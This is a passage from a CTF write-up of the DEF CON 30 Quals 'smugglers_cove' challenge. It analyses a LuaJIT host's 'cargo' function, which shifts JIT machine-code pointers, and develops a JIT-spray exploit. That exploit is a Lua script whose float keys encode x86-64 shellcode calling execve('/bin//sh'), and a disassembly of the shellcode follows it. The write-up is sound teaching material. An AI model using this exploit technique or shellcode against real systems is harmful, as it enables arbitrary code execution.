class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span 
class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">GCtrace* <span class="title function_">getTrace</span><span class="params">(lua_State* L, <span class="type">uint8_t</span> index)</span> &#123;</span><br><span class="line">    jit_State* js = L2J(L);</span><br><span class="line">    <span class="keyword">if</span> (index &gt;= js-&gt;sizetrace)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">return</span> (GCtrace*)gcref(js-&gt;trace[index]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">debug_jit</span><span class="params">(lua_State* L)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (lua_gettop(L) != <span class="number">2</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> luaL_error(L, <span class="string">&quot;expecting exactly 1 arguments&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    luaL_checktype(L, <span class="number">1</span>, LUA_TFUNCTION);</span><br><span class="line"></span><br><span class="line">    <span class="type">const</span> GCfunc* v = lua_topointer(L, <span class="number">1</span>);</span><br><span class="line">    <span class="keyword">if</span> (!isluafunc(v)) &#123;</span><br><span class="line">        <span class="keyword">return</span> luaL_error(L, <span class="string">&quot;expecting lua function&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">uint8_t</span> offset = lua_tointeger(L, <span class="number">2</span>);</span><br><span class="line">    <span 
class="type">uint8_t</span>* bytecode = mref(v-&gt;l.pc, <span class="type">void</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">uint8_t</span> op = bytecode[<span class="number">0</span>];</span><br><span class="line">    <span class="type">uint8_t</span> index = bytecode[<span class="number">2</span>];</span><br><span class="line"></span><br><span class="line">    GCtrace* t = getTrace(L, index);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!t || !t-&gt;mcode || !t-&gt;szmcode) &#123;</span><br><span class="line">        <span class="keyword">return</span> luaL_error(L, <span class="string">&quot;Blimey! There is no cargo in this ship!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;INSPECTION: This ship&#x27;s JIT cargo was found to be %p\n&quot;</span>, t-&gt;mcode);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (offset != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (offset &gt;= t-&gt;szmcode - <span class="number">1</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> luaL_error(L, <span class="string">&quot;Avast! Offset too large!&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        t-&gt;mcode += offset;</span><br><span class="line">        t-&gt;szmcode -= offset;</span><br><span class="line"></span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;... 
yarr let ye apply a secret offset, cargo is now %p ...\n&quot;</span>, t-&gt;mcode);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><p>The registered Lua function <code>cargo</code> takes two arguments, which must be a <strong>function</strong> and an <strong>integer</strong>, in that order. As the code shows, when Lua calls <code>cargo</code>, the C function <code>debug_jit</code> first <strong>looks up the JIT structure (the trace) that belongs to the Lua function passed in</strong>, and then <strong>shifts the start of that trace's machine code by the given offset</strong>. The two fields it modifies, <code>GCtrace::mcode</code> and <code>GCtrace::szmcode</code>, are the start address and the size of the compiled machine code, respectively:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Trace object. */</span></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">GCtrace</span> &#123;</span></span><br><span class="line">  ...</span><br><span class="line">  MSize szmcode;  <span class="comment">/* Size of machine code. */</span></span><br><span class="line">  MCode *mcode;   <span class="comment">/* Start of machine code. 
*/</span></span><br><span class="line">  ...</span><br><span class="line">&#125; GCtrace;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>So, if we can <strong>craft JIT-compiled machine code that embeds immediates of our choosing</strong> and then <strong>shift the start address of the JIT code</strong>, control flow will <strong>decode those carefully prepared immediates as instructions and execute them</strong>, which lets us run shellcode.</p><p>This technique is also known as <strong>JIT Spray</strong>.</p><p>Note that <code>cove.c</code> applies the following JIT configuration:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">set_jit_settings</span><span class="params">(lua_State* L)</span> &#123;</span><br><span class="line">    luaL_dostring(L,</span><br><span class="line">        <span class="string">&quot;jit.opt.start(&#x27;3&#x27;);&quot;</span></span><br><span class="line">        <span class="string">&quot;jit.opt.start(&#x27;hotloop=1&#x27;);&quot;</span></span><br><span class="line">    );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Both lines of Lua code call the <code>jit.opt.start()</code> function, which is implemented at <code>LuaJIT/src/lib_jit.c:512</code>:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td 
class="code"><pre><span class="line"><span class="comment">/* jit.opt.start(flags...) */</span></span><br><span class="line">LJLIB_CF(jit_opt_start)</span><br><span class="line">&#123;</span><br><span class="line">  jit_State *J = L2J(L);</span><br><span class="line">  <span class="type">int</span> nargs = (<span class="type">int</span>)(L-&gt;top - L-&gt;base);</span><br><span class="line">  <span class="keyword">if</span> (nargs == <span class="number">0</span>) &#123;</span><br><span class="line">    J-&gt;flags = (J-&gt;flags &amp; ~JIT_F_OPT_MASK) | JIT_F_OPT_DEFAULT;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">1</span>; i &lt;= nargs; i++) &#123;</span><br><span class="line">      <span class="type">const</span> <span class="type">char</span> *str = strdata(lj_lib_checkstr(L, i));</span><br><span class="line">      <span class="keyword">if</span> (!jitopt_level(J, str) &amp;&amp;</span><br><span class="line">          !jitopt_flag(J, str) &amp;&amp;</span><br><span class="line">          !jitopt_param(J, str))</span><br><span class="line">        lj_err_callerv(L, LJ_ERR_JITOPT, str);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The two calls to <code>jit.opt.start</code> set the following:</p><ul><li><p><code>jit.opt.start('3')</code>: handled by <code>jitopt_level</code>, which sets the optimization level to 3 (the highest).</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Optimization levels set a fixed combination of flags. */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> JIT_F_OPT_0 0</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> JIT_F_OPT_1 (JIT_F_OPT_FOLD|JIT_F_OPT_CSE|JIT_F_OPT_DCE)</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> JIT_F_OPT_2 (JIT_F_OPT_1|JIT_F_OPT_NARROW|JIT_F_OPT_LOOP)</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> JIT_F_OPT_3 (JIT_F_OPT_2|\</span></span><br><span class="line"><span class="meta">  JIT_F_OPT_FWD|JIT_F_OPT_DSE|JIT_F_OPT_ABC|JIT_F_OPT_SINK|JIT_F_OPT_FUSE)</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> JIT_F_OPT_DEFAULT JIT_F_OPT_3</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/* Parse optimization level. 
*/</span></span><br><span class="line"><span class="type">static</span> <span class="type">int</span> <span class="title function_">jitopt_level</span><span class="params">(jit_State *J, <span class="type">const</span> <span class="type">char</span> *str)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">if</span> (str[<span class="number">0</span>] &gt;= <span class="string">&#x27;0&#x27;</span> &amp;&amp; str[<span class="number">0</span>] &lt;= <span class="string">&#x27;9&#x27;</span> &amp;&amp; str[<span class="number">1</span>] == <span class="string">&#x27;\0&#x27;</span>) &#123;</span><br><span class="line">    <span class="type">uint32_t</span> flags;</span><br><span class="line">    <span class="keyword">if</span> (str[<span class="number">0</span>] == <span class="string">&#x27;0&#x27;</span>) flags = JIT_F_OPT_0;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (str[<span class="number">0</span>] == <span class="string">&#x27;1&#x27;</span>) flags = JIT_F_OPT_1;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (str[<span class="number">0</span>] == <span class="string">&#x27;2&#x27;</span>) flags = JIT_F_OPT_2;</span><br><span class="line">    <span class="comment">// 这里！</span></span><br><span class="line">    <span class="keyword">else</span> flags = JIT_F_OPT_3;</span><br><span class="line">    J-&gt;flags = (J-&gt;flags &amp; ~JIT_F_OPT_MASK) | flags;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;  <span class="comment">/* Ok. */</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;  <span class="comment">/* No match. 
*/</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>jit.opt.start('hotloop=1')</code>: handled by <code>jitopt_param</code>, which stores the <code>hotloop</code> parameter as 1 and then re-initializes the hotcount table.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Parse optimization parameter. 
*/</span></span><br><span class="line"><span class="type">static</span> <span class="type">int</span> <span class="title function_">jitopt_param</span><span class="params">(jit_State *J, <span class="type">const</span> <span class="type">char</span> *str)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">const</span> <span class="type">char</span> *lst = JIT_P_STRING;</span><br><span class="line">  <span class="type">int</span> i;</span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; JIT_P__MAX; i++) &#123;</span><br><span class="line">    <span class="type">size_t</span> len = *(<span class="type">const</span> <span class="type">uint8_t</span> *)lst;</span><br><span class="line">    lua_assert(len != <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strncmp</span>(str, lst+<span class="number">1</span>, len) == <span class="number">0</span> &amp;&amp; str[len] == <span class="string">&#x27;=&#x27;</span>) &#123;</span><br><span class="line">      <span class="type">int32_t</span> n = <span class="number">0</span>;</span><br><span class="line">      <span class="type">const</span> <span class="type">char</span> *p = &amp;str[len+<span class="number">1</span>];</span><br><span class="line">      <span class="keyword">while</span> (*p &gt;= <span class="string">&#x27;0&#x27;</span> &amp;&amp; *p &lt;= <span class="string">&#x27;9&#x27;</span>)</span><br><span class="line">  n = n*<span class="number">10</span> + (*p++ - <span class="string">&#x27;0&#x27;</span>);</span><br><span class="line">      <span class="keyword">if</span> (*p) <span class="keyword">return</span> <span class="number">0</span>;  <span class="comment">/* Malformed number. */</span></span><br><span class="line">      <span class="comment">// 1. 
控制流进入此处，保存参数</span></span><br><span class="line">      J-&gt;param[i] = n;</span><br><span class="line">      <span class="comment">// 2. hotloop 判断</span></span><br><span class="line">      <span class="keyword">if</span> (i == JIT_P_hotloop)</span><br><span class="line">    <span class="comment">// 3. 调用该函数执行初始化操作</span></span><br><span class="line">  lj_dispatch_init_hotcount(J2G(J));</span><br><span class="line">      <span class="keyword">return</span> <span class="number">1</span>;  <span class="comment">/* Ok. */</span></span><br><span class="line">    &#125;</span><br><span class="line">    lst += <span class="number">1</span>+len;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;  <span class="comment">/* No match. */</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> LJ_HASJIT</span></span><br><span class="line"><span class="comment">/* Initialize hotcount table. 
*/</span></span><br><span class="line"><span class="type">void</span> <span class="title function_">lj_dispatch_init_hotcount</span><span class="params">(global_State *g)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int32_t</span> hotloop = G2J(g)-&gt;param[JIT_P_hotloop];</span><br><span class="line">  HotCount start = (HotCount)(hotloop*HOTCOUNT_LOOP - <span class="number">1</span>);</span><br><span class="line">  HotCount *hotcount = G2GG(g)-&gt;hotcount;</span><br><span class="line">  <span class="type">uint32_t</span> i;</span><br><span class="line">  <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; HOTCOUNT_SIZE; i++)</span><br><span class="line">    hotcount[i] = start;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>这里需要参考以下两个链接来理解 hotcount：</p><ul><li><a href="https://www.jianshu.com/p/a1f394aba9b2">译作：窥斑见豹–Peeking inside luaJIT - 简书</a></li><li><a href="https://blog.csdn.net/u010913001/article/details/102979918">LuaJit Trace Compiler剖析 - CSDN</a></li></ul><p>简单来说，hotcount 就是 luajit 追踪<strong>特定控制流转移指令</strong>（例如调用、跳转等）的一个哈希表，其中存放着所最终指令的热度。luajit 是 <strong>tracing jit</strong>，而非 method jit，这意味着 luajit 在优化时会以<strong>路径</strong>为单位，而不是以函数或方法为单位。既然是追踪路径，那么自然就会对<strong>控制流转移指令</strong>更加的关注，也就会有 hotcount table 这样的设计。</p></li></ul><blockquote><p>不过 cove 对 JIT 的配置不会对我们的漏洞利用产生太大影响，这里只是简单的扩展了一下。</p></blockquote><h2 id="四、漏洞利用">四、漏洞利用</h2><blockquote><p>前置调试知识：</p><p>若需执行程序，则直接执行  <code>LD_LIBRARY_PATH=. 
./cove exp.lua</code>.</p><p>To debug the program, first start a gdb session with <code>gdb --args ./cove exp.lua</code>, then run <code>set env LD_LIBRARY_PATH .</code> inside gdb.</p></blockquote><p>First, write a function to poke at this LuaJIT:</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">func</span><span class="params">()</span></span> </span><br><span class="line">    <span class="keyword">local</span> arr = &#123;<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>&#125;</span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(func)</span><br><span class="line"><span class="comment">-- cargo(func, 0)</span></span><br></pre></td></tr></table></figure><p>This triggers a SIGSEGV. Debugging shows that the print function implemented in cove dereferences a null pointer: <code>lua_tostring</code> returns NULL for a function value, and that NULL is passed straight to <code>puts</code>. The fix is as follows:</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"> int print(lua_State* L) &#123;</span><br><span class="line">     if (lua_gettop(L) &lt; 1) &#123;</span><br><span class="line">         return luaL_error(L, &quot;expecting at least 1 arguments&quot;);</span><br><span class="line">     &#125;</span><br><span class="line">     const char* s = lua_tostring(L, 1);</span><br><span class="line"><span class="deletion">-  
  puts(s);</span></span><br><span class="line"><span class="addition">+    puts(s ? s : &quot;(nil)&quot;);</span></span><br><span class="line">     return 0;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure><p>After recompiling, the SIGSEGV no longer occurs.</p><p>Add two call sites and <code>func</code> gets compiled by the JIT:</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">func</span><span class="params">()</span></span> </span><br><span class="line">    <span class="keyword">local</span> arr = &#123;<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>, <span class="number">6</span>&#125;</span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">func()</span><br><span class="line">func()</span><br><span class="line">cargo(func, <span class="number">0</span>)</span><br><span class="line"><span class="comment">-- Output: INSPECTION: This ship&#x27;s JIT cargo was found to be 0x800021feffdc</span></span><br></pre></td></tr></table></figure><p>GDB confirms that this address does hold the generated machine code, and that it lies in an rx segment:</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830140103661.png" alt="image-20220830140103661"></p><p>Set a breakpoint on the JIT-generated machine code and it is hit the next time <code>func</code> runs (note that the screenshot below does not correspond to the one above). If we change offset, the second argument of the <code>cargo</code> call, then the next time <strong>the JIT-compiled function runs, control flow really is shifted by offset bytes</strong>:</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830140429872.png" alt="image-20220830140429872"></p><p>Now that we know how to trigger JIT optimization of a function and have a rough picture of the JIT 
machine code it generates, the next step is to try to plant immediates of our choosing in the JIT machine code. One thing to keep in mind: <strong>lua has only one numeric type, <code>Number</code>, with no distinction between integers and floats</strong>, and LuaJIT internally represents the lua Number type as a <strong>floating-point number</strong>. This can be verified with the following lua code:</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">-- a large number</span></span><br><span class="line">num1 = <span class="number">0x112233445566</span></span><br><span class="line"><span class="built_in">print</span>(num1)        <span class="comment">-- prints 18838586676582</span></span><br><span class="line">num1 = num1 + <span class="number">0.5</span></span><br><span class="line"><span class="comment">-- precision is lost on output</span></span><br><span class="line"><span class="built_in">print</span>(num1)        <span class="comment">-- prints 18838586676583</span></span><br><span class="line"></span><br><span class="line"><span class="comment">-- a very large number, printed in floating-point notation</span></span><br><span class="line">num1 = <span class="number">0x1122334455667788</span></span><br><span class="line"><span class="built_in">print</span>(num1)        <span class="comment">-- prints 1.2346056164365e+18</span></span><br></pre></td></tr></table></figure><p>Now let's try to plant specific values in the JIT code. LuaJIT enables many compiler optimizations such as dead code elimination, so <strong>an array object created inside the function must be used at least once</strong>, otherwise it is removed outright. Because the print function is such a pain to use, I switched to a different way of keeping the code from being optimized away.</p><p>The lua test code is as follows:</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">func</span><span class="params">(arr)</span></span> </span><br><span class="line">    arr[<span class="number">0</span>] = <span class="number">1.0</span>;</span><br><span class="line">    arr[<span class="number">1</span>] = <span class="number">2.0</span>;</span><br><span class="line">    arr[<span class="number">2</span>] = <span class="number">3.0</span>;</span><br><span class="line">    arr[<span class="number">3</span>] = <span class="number">4.0</span>;</span><br><span class="line">    arr[<span class="number">4</span>] = <span class="number">5.0</span>;</span><br><span class="line">    arr[<span class="number">5</span>] = <span class="number">6.0</span>;</span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">arr = &#123;<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>&#125;</span><br><span class="line">func(arr)</span><br><span class="line">func(arr)</span><br><span class="line">cargo(func, <span class="number">0</span>)</span><br><span class="line">func(arr)</span><br></pre></td></tr></table></figure><p>Looking at the compiled code, the generated JIT code does not meet our needs: LuaJIT <strong>stores the numbers on the right-hand side of the assignment separately</strong> at another memory location and loads them when needed:</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830143407321.png" alt="image-20220830143407321"></p><p>No matter how we vary the right-hand side, the value is still loaded from other memory, so we can instead try changing the <strong>key</strong> on the left-hand side, i.e. the <strong>xxx</strong> in <code>arr[xxx] = _</code>.</p><p>After some experimentation, it turns out that if the key is:</p><ul><li><p>a character or string: the JIT code contains plenty of immediates, but they are <strong>not controllable</strong>.</p></li><li><p>floats such as 1.0, 2.0, 3.0 
that are <strong>integer-valued and consecutive</strong>: the generated JIT code is still the same as the earlier JIT code.</p></li><li><p><strong>non-consecutive floats</strong>: the generated code is exactly what we need. For example, the following lua code:</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">func</span><span class="params">(arr)</span></span> </span><br><span class="line">    arr[<span class="number">1.0</span>] = <span class="number">1</span>;</span><br><span class="line">    arr[<span class="number">5.0</span>] = <span class="number">2</span>;</span><br><span class="line">    arr[<span class="number">21.0</span>] = <span class="number">3</span>;</span><br><span class="line">    arr[<span class="number">244.0</span>] = <span class="number">4</span>;</span><br><span class="line">    arr[<span class="number">21.0</span>] = <span class="number">5</span>;</span><br><span class="line">    arr[<span class="number">422.0</span>] = <span class="number">6</span>;</span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">arr = &#123;<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>&#125;</span><br><span class="line">func(arr)</span><br><span class="line">func(arr)</span><br><span class="line">cargo(func, <span class="number">0</span>)</span><br><span class="line">func(arr)</span><br></pre></td></tr></table></figure><p>The generated JIT 
code:</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830145419116.png" alt="image-20220830145419116"></p></li></ul><p>This way we can <strong>plant chosen data in the JIT code</strong>. What remains is to write the shellcode and plant it in the JIT code, which is just grunt work.</p><blockquote><p>A handy site for this is <a href="https://tooltt.com/floatconverter/">an online float-to-binary converter</a>, which makes it very convenient to <strong>convert between floating-point numbers and their binary representation</strong>.</p></blockquote><p>The exploit I wrote is shown below (<strong>note: this exp has more than a few problems</strong>):</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">f</span><span class="params">(a)</span></span> </span><br><span class="line">    a[<span class="number">1.2015822066494834e-135</span>] = <span class="number">1</span>; <span class="comment">-- 4831f6 4889f2 ebxx  0x(23ebf28948f63148)</span></span><br><span class="line">    a[<span class="number">1.888017891495551e-193</span>] = <span class="number">2</span>; <span class="comment">-- 4889f1 56 9090 ebxx 0x(17eb909056f18948)</span></span><br><span class="line">    a[<span class="number">1.8732669152797884e-193</span>] = <span class="number">3</span>; <span class="comment">-- 682f62696e 59 ebxx 0x(17eb596e69622f68)</span></span><br><span class="line">    a[<span class="number">1.8748660135882913e-193</span>] = <span class="number">4</span>; <span class="comment">-- 682f2f7368 5f ebxx 
0x(17eb5f68732f2f68)</span></span><br><span class="line">    a[<span class="number">1.8880176708811596e-193</span>] = <span class="number">5</span>; <span class="comment">-- 48c1e720 9090 ebxx 0x(17eb909020e7c148)</span></span><br><span class="line">    a[<span class="number">2.383013609192317e-222</span>] = <span class="number">6</span>; <span class="comment">-- 4809cf 57 9090 ebxx 0x(11eb909057cf0948)</span></span><br><span class="line">    a[<span class="number">1.872946064693589e-193</span>] = <span class="number">7</span>; <span class="comment">-- 4889e7 6a3b 58 ebxx 0x(17eb583b6ae78948)</span></span><br><span class="line">    a[<span class="number">1.8880178917328522e-193</span>] = <span class="number">8</span>; <span class="comment">-- 99 6a00 57 9090 ebxx 0x(17eb909057006a99)</span></span><br><span class="line">    a[<span class="number">-2.4120921044623575e+255</span>] = <span class="number">9</span>; <span class="comment">-- 4889e6 0f05 90 f4f4 0x(f4f490050fe68948)</span></span><br><span class="line"><span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">a = &#123;<span class="number">1</span>, <span class="number">2</span>, <span class="number">3</span>, <span class="number">4</span>, <span class="number">5</span>&#125;</span><br><span class="line">f(a)</span><br><span class="line">f(a)</span><br><span class="line">cargo(f, <span class="number">0x80</span>)</span><br><span class="line">f(a)</span><br></pre></td></tr></table></figure><p>The shellcode that actually gets executed is:</p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span 
class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">4831f6        xor rsi, rsi</span><br><span class="line">4889f2        mov rdx, rsi</span><br><span class="line">4889f1        mov rcx, rsi</span><br><span class="line"></span><br><span class="line">56            push rsi</span><br><span class="line">682f62696e    push 0x6e69622f</span><br><span class="line">59            pop rcx</span><br><span class="line">682f2f7368    push 0x68732f2f</span><br><span class="line">5f            pop rdi</span><br><span class="line">48c1e720      shl rdi, 32</span><br><span class="line">4809cf        or rdi, rcx</span><br><span class="line">57            push rdi</span><br><span class="line">4889e7        mov rdi, rsp</span><br><span class="line"></span><br><span class="line">6a3b          push 0x3b</span><br><span class="line">58            pop rax</span><br><span class="line">99            cdq</span><br><span class="line"></span><br><span class="line">6a00          push 0</span><br><span class="line">57            push rdi</span><br><span class="line">4889e6        mov rsi, rsp</span><br><span class="line"></span><br><span class="line">0f05          syscall</span><br></pre></td></tr></table></figure><blockquote><p>Note: the opcode of <code>jmp rel8</code> is <code>eb</code>.</p></blockquote><p>At this point we are about to execute <code>SYS_execve(&quot;/bin//sh&quot;, [&quot;/bin//sh&quot;, NULL], NULL)</code> (mcode + 0x181):</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830202644199.png" alt="image-20220830202644199"></p><p>Strangely, though, sh exits immediately:</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830202913401.png" 
